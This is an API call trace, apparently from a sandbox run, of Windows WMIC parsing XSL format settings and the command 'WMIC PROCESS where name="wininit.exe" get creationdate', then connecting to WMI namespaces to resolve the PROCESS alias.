[0562.954] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.954] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.954] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.954] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.954] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] malloc (_Size=0x30) returned 0x188440
[0562.954] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.954] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.954] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.954] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=15, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.954] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="htable.xsl") returned 0x0
[0562.954] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.954] malloc (_Size=0x18) returned 0x1893e0
[0562.955] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.955] free (_Block=0x1893e0)
[0562.955] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x80070001c)) returned 0x0
[0562.955] malloc (_Size=0x18) returned 0x1893e0
[0562.955] malloc (_Size=0x18) returned 0x189400
[0562.955] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.955] SysStringLen (param_1="TABLE") returned 0x5
[0562.955] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.955] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.955] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.955] SysStringLen (param_1="XML") returned 0x3
[0562.955] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.955] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.956] SysStringLen (param_1="XML") returned 0x3
[0562.956] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.956] malloc (_Size=0x30) returned 0x188480
[0562.956] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.956] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.956] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.956] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=16, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.956] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="htable.xsl") returned 0x0
[0562.956] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.956] malloc (_Size=0x18) returned 0x189420
[0562.956] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.956] free (_Block=0x189420)
[0562.956] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x80070001c)) returned 0x0
[0562.956] malloc (_Size=0x18) returned 0x189420
[0562.957] malloc (_Size=0x18) returned 0x189440
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="TABLE") returned 0x5
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="XML") returned 0x3
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.957] SysStringLen (param_1="XML") returned 0x3
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] malloc (_Size=0x30) returned 0x1884c0
[0562.957] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.957] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.957] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.957] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=17, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.958] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="mof.xsl") returned 0x0
[0562.958] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.958] malloc (_Size=0x18) returned 0x189460
[0562.958] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.958] free (_Block=0x189460)
[0562.958] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x80070001c)) returned 0x0
[0562.958] malloc (_Size=0x18) returned 0x189460
[0562.958] malloc (_Size=0x18) returned 0x189480
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] SysStringLen (param_1="TABLE") returned 0x5
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.958] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] malloc (_Size=0x30) returned 0x188500
[0562.959] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.959] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.959] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.959] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=18, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.959] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="mof.xsl") returned 0x0
[0562.959] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.959] malloc (_Size=0x18) returned 0x1894a0
[0562.959] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.959] free (_Block=0x1894a0)
[0562.959] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x80070001c)) returned 0x0
[0562.959] malloc (_Size=0x18) returned 0x1894a0
[0562.959] malloc (_Size=0x18) returned 0x1894c0
[0562.959] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.959] SysStringLen (param_1="TABLE") returned 0x5
[0562.959] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.960] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.960] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.960] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.960] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.960] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] malloc (_Size=0x30) returned 0x188540
[0562.960] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.960] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.960] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.960] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=19, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.960] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="textvaluelist.xsl") returned 0x0
[0562.960] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.960] malloc (_Size=0x18) returned 0x1894e0
[0562.961] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.961] free (_Block=0x1894e0)
[0562.961] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x80070001c)) returned 0x0
[0562.961] malloc (_Size=0x18) returned 0x1894e0
[0562.961] malloc (_Size=0x18) returned 0x189500
[0562.961] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.961] SysStringLen (param_1="TABLE") returned 0x5
[0562.961] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.961] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.961] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.961] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.961] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.962] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.962] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.962] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.962] malloc (_Size=0x30) returned 0x188580
[0562.962] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.962] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.962] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.962] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=20, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.962] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="textvaluelist.xsl") returned 0x0
[0562.962] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.962] malloc (_Size=0x18) returned 0x189520
[0562.962] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.963] free (_Block=0x189520)
[0562.963] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x80070001c)) returned 0x0
[0562.963] malloc (_Size=0x18) returned 0x189520
[0562.963] malloc (_Size=0x18) returned 0x189540
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="TABLE") returned 0x5
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.963] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] malloc (_Size=0x30) returned 0x1885c0
[0562.964] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.964] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.964] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.964] IUnknown:Release (This=0x1fd9cc0) returned 0x0
[0562.964] FreeThreadedDOMDocument:IUnknown:Release (This=0x1fdbc50) returned 0x1
[0562.964] FreeThreadedDOMDocument:IUnknown:Release (This=0x1fd71d0) returned 0x0
[0562.964] free (_Block=0x189040)
[0562.964] GetCommandLineW () returned="WMIC PROCESS where name=\"wininit.exe\" get creationdate "
[0562.965] malloc (_Size=0x80) returned 0x186e60
[0562.965] memcpy_s (in: _Destination=0x186e60, _DestinationSize=0x7e, _Source=0x272718, _SourceSize=0x70 | out: _Destination=0x186e60) returned 0x0
[0562.965] malloc (_Size=0x18) returned 0x189040
[0562.965] malloc (_Size=0x18) returned 0x189560
[0562.965] malloc (_Size=0x18) returned 0x189580
[0562.966] malloc (_Size=0x18) returned 0x1895a0
[0562.966] malloc (_Size=0x80) returned 0x18cb50
[0562.966] GetLocalTime (in: lpSystemTime=0xaf770 | out: lpSystemTime=0xaf770*(wYear=0x7e8, wMonth=0x6, wDayOfWeek=0x1, wDay=0x3, wHour=0xb, wMinute=0x23, wSecond=0x2e, wMilliseconds=0x3df))
[0562.966] _vsnwprintf (in: _Buffer=0x18cb50, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xaf6c8 | out: _Buffer="06-03-2024T11:36:15") returned 19
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] malloc (_Size=0x6a) returned 0x18cbe0
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] malloc (_Size=0x6a) returned 0x18cc60
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] malloc (_Size=0x10) returned 0x1895c0
[0562.966] lstrlenW (lpString="PROCESS") returned 7
[0562.966] _wcsicmp (_String1="PROCESS", _String2="\"NULL\"") returned 78
[0562.966] malloc (_Size=0x10) returned 0x1895e0
[0562.966] malloc (_Size=0x8) returned 0x18cce0
[0562.966] free (_Block=0x0)
[0562.966] free (_Block=0x1895c0)
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] malloc (_Size=0xc) returned 0x1895c0
[0562.966] lstrlenW (lpString="where") returned 5
[0562.966] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85
[0562.966] malloc (_Size=0xc) returned 0x189600
[0562.966] malloc (_Size=0x10) returned 0x189620
[0562.966] memmove_s (in: _Destination=0x189620, _DestinationSize=0x8, _Source=0x18cce0, _SourceSize=0x8 | out: _Destination=0x189620) returned 0x0
[0562.966] free (_Block=0x18cce0)
[0562.966] free (_Block=0x0)
[0562.966] free (_Block=0x1895c0)
[0562.967] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.967] lstrlenW (lpString="WHERE") returned 5
[0562.967] lstrlenW (lpString="where") returned 5
[0562.967] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2
[0562.967] malloc (_Size=0x26) returned 0x18cce0
[0562.967] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0562.967] _wcsicmp (_String1="name=\"wininit.exe\"", _String2="\"NULL\"") returned 76
[0562.967] malloc (_Size=0x26) returned 0x18cd10
[0562.967] malloc (_Size=0x18) returned 0x1895c0
[0562.967] memmove_s (in: _Destination=0x1895c0, _DestinationSize=0x10, _Source=0x189620, _SourceSize=0x10 | out: _Destination=0x1895c0) returned 0x0
[0562.967] free (_Block=0x189620)
[0562.967] free (_Block=0x0)
[0562.967] free (_Block=0x18cce0)
[0562.967] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.967] malloc (_Size=0x8) returned 0x18cce0
[0562.967] lstrlenW (lpString="get") returned 3
[0562.967] _wcsicmp (_String1="get", _String2="\"NULL\"") returned 69
[0562.968] malloc (_Size=0x8) returned 0x18cd40
[0562.968] malloc (_Size=0x20) returned 0x18cd60
[0562.968] memmove_s (in: _Destination=0x18cd60, _DestinationSize=0x18, _Source=0x1895c0, _SourceSize=0x18 | out: _Destination=0x18cd60) returned 0x0
[0562.968] free (_Block=0x1895c0)
[0562.968] free (_Block=0x0)
[0562.968] free (_Block=0x18cce0)
[0562.968] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.968] malloc (_Size=0x1a) returned 0x18cce0
[0562.968] lstrlenW (lpString="creationdate") returned 12
[0562.968] _wcsicmp (_String1="creationdate", _String2="\"NULL\"") returned 65
[0562.968] malloc (_Size=0x1a) returned 0x18cd90
[0562.968] malloc (_Size=0x30) returned 0x188600
[0562.968] memmove_s (in: _Destination=0x188600, _DestinationSize=0x20, _Source=0x18cd60, _SourceSize=0x20 | out: _Destination=0x188600) returned 0x0
[0562.968] free (_Block=0x18cd60)
[0562.968] free (_Block=0x0)
[0562.968] free (_Block=0x18cce0)
[0562.968] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.969] malloc (_Size=0x28) returned 0x18cce0
[0562.969] lstrlenW (lpString="QUIT") returned 4
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 1
[0562.969] lstrlenW (lpString="EXIT") returned 4
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3
[0562.969] free (_Block=0x18cce0)
[0562.969] WbemLocator:IUnknown:AddRef (This=0x29cc20) returned 0x2
[0562.969] malloc (_Size=0x28) returned 0x18cce0
[0562.969] lstrlenW (lpString="/") returned 1
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="/", cchCount2=1) returned 3
[0562.969] lstrlenW (lpString="-") returned 1
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="-", cchCount2=1) returned 3
[0562.969] lstrlenW (lpString="CLASS") returned 5
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3
[0562.970] lstrlenW (lpString="PATH") returned 4
[0562.970] lstrlenW (lpString="PROCESS") returned 7
[0562.970] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3
[0562.970] lstrlenW (lpString="CONTEXT") returned 7
[0562.970] lstrlenW (lpString="PROCESS") returned 7
[0562.970] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3
[0562.970] lstrlenW (lpString="PROCESS") returned 7
[0562.970] malloc (_Size=0x10) returned 0x1895c0
[0562.970] lstrlenW (lpString="PROCESS") returned 7
[0562.973] GetCurrentThreadId () returned 0x440
[0562.973] ??0CHString@@QEAA@XZ () returned 0xaf580
[0562.973] malloc (_Size=0x18) returned 0x189620
[0562.974] malloc (_Size=0x18) returned 0x189640
[0562.974] WbemLocator:IWbemLocator:ConnectServer (in: This=0x29cc20, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffad2998 | out: ppNamespace=0xffad2998*=0x308880) returned 0x0
[0563.029] free (_Block=0x189640)
[0563.029] free (_Block=0x189620)
[0563.030] CoSetProxyBlanket (pProxy=0x308880, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0563.030] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.030] GetCurrentThreadId () returned 0x440
[0563.030] ??0CHString@@QEAA@XZ () returned 0xaf418
[0563.030] malloc (_Size=0x18) returned 0x189620
[0563.030] malloc (_Size=0x18) returned 0x189640
[0563.030] malloc (_Size=0x18) returned 0x189660
[0563.030] malloc (_Size=0x18) returned 0x189680
[0563.030] SysStringLen (param_1="root\\cli") returned 0x8
[0563.030] SysStringLen (param_1="\\") returned 0x1
[0563.030] memcpy (in: _Dst=0x31ee88, _Src=0x31ee28, _Size=0x12 | out: _Dst=0x31ee88) returned 0x31ee88
[0563.030] memcpy (in: _Dst=0x31ee98, _Src=0x31edc8, _Size=0x4 | out: _Dst=0x31ee98) returned 0x31ee98
[0563.030] malloc (_Size=0x18) returned 0x1896a0
[0563.030] SysStringLen (param_1="root\\cli\\") returned 0x9
[0563.030] SysStringLen (param_1="ms_409") returned 0x6
[0563.031] memcpy (in: _Dst=0x286718, _Src=0x31ee88, _Size=0x14 | out: _Dst=0x286718) returned 0x286718
[0563.031] memcpy (in: _Dst=0x28672a, _Src=0x31edf8, _Size=0xe | out: _Dst=0x28672a) returned 0x28672a
[0563.031] free (_Block=0x189680)
[0563.031] free (_Block=0x189660)
[0563.031] free (_Block=0x189640)
[0563.031] free (_Block=0x189620)
[0563.031] malloc (_Size=0x18) returned 0x189620
[0563.031] WbemLocator:IWbemLocator:ConnectServer (in: This=0x29cc20, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffad29a0 | out: ppNamespace=0xffad29a0*=0x3089a0) returned 0x0
[0563.046] free (_Block=0x189620)
[0563.046] free (_Block=0x1896a0)
[0563.046] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.046] GetCurrentThreadId () returned 0x440
[0563.047] ??0CHString@@QEAA@XZ () returned 0xaf590
[0563.047] malloc (_Size=0x18) returned 0x1896a0
[0563.047] malloc (_Size=0x18) returned 0x189620
[0563.047] malloc (_Size=0x18) returned 0x189640
[0563.047] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0563.047] malloc (_Size=0x3a) returned 0x18cdc0
[0563.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MSFT_CliAlias.FriendlyName='", cbMultiByte=-1, lpWideCharStr=0x18cdc0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0563.048] free (_Block=0x18cdc0)
[0563.048] malloc (_Size=0x18) returned 0x189660
[0563.048] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0563.048] SysStringLen (param_1="PROCESS") returned 0x7
[0563.048] memcpy (in: _Dst=0x2d6ed8, _Src=0x2a42a8, _Size=0x3a | out: _Dst=0x2d6ed8) returned 0x2d6ed8
[0563.048] memcpy (in: _Dst=0x2d6f10, _Src=0x31ee28, _Size=0x10 | out: _Dst=0x2d6f10) returned 0x2d6f10
[0563.048] malloc (_Size=0x18) returned 0x189680
[0563.048] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='PROCESS") returned 0x23
[0563.048] SysStringLen (param_1="'") returned 0x1
[0563.048] memcpy (in: _Dst=0x2d6e68, _Src=0x2d6ed8, _Size=0x48 | out: _Dst=0x2d6e68) returned 0x2d6e68
[0563.048] memcpy (in: _Dst=0x2d6eae, _Src=0x31ee88, _Size=0x4 | out: _Dst=0x2d6eae) returned 0x2d6eae
[0563.048] free (_Block=0x189660)
[0563.048] free (_Block=0x189640)
[0563.049] free (_Block=0x189620)
[0563.049] free (_Block=0x1896a0)
[0563.049] IWbemServices:GetObject (in: This=0x308880, strObjectPath="MSFT_CliAlias.FriendlyName='PROCESS'", lFlags=0, pCtx=0x0, ppObject=0xaf598*=0x0, ppCallResult=0x0 | out: ppObject=0xaf598*=0x320380, ppCallResult=0x0) returned 0x0
[0563.087] malloc (_Size=0x18) returned 0x1896a0
[0563.087] IWbemClassObject:Get (in: This=0x320380, wszName="Target", lFlags=0, pVal=0xaf4c0*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0xffad2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf4c0*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Process", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.088] free (_Block=0x1896a0)
[0563.088] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.088] malloc (_Size=0x38) returned 0x188640
[0563.088] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.088] malloc (_Size=0x18) returned 0x1896a0
[0563.088] IWbemClassObject:Get (in: This=0x320380, wszName="PWhere", lFlags=0, pVal=0xaf4c0*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec518, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf4c0*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE ProcessId='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.088] free (_Block=0x1896a0)
[0563.088] lstrlenW (lpString="WHERE ProcessId='#'") returned 19
[0563.088] malloc (_Size=0x28) returned 0x18cd60
[0563.088] lstrlenW (lpString="WHERE ProcessId='#'") returned 19
[0563.088] malloc (_Size=0x18) returned 0x1896a0
[0563.089] IWbemClassObject:Get (in: This=0x320380, wszName="Connection", lFlags=0, pVal=0xaf4c0*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec518, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf4c0*(varType=0xd, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x348940, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.089] free (_Block=0x1896a0)
[0563.089] IUnknown:QueryInterface (in: This=0x348940, riid=0xffa67360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xaf4b0 | out: ppvObject=0xaf4b0*=0x348940) returned 0x0
[0563.089] GetCurrentThreadId () returned 0x440
[0563.090] ??0CHString@@QEAA@XZ () returned 0xaf3d8
[0563.090] malloc (_Size=0x18) returned 0x1896a0
[0563.090] IWbemClassObject:Get (in: This=0x348940, wszName="Namespace", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0xffa7738f, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.090] free (_Block=0x1896a0)
[0563.090] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0563.090] malloc (_Size=0x16) returned 0x1896a0
[0563.090] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0563.090] malloc (_Size=0x18) returned 0x189620
[0563.090] IWbemClassObject:Get (in: This=0x348940, wszName="Locale", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
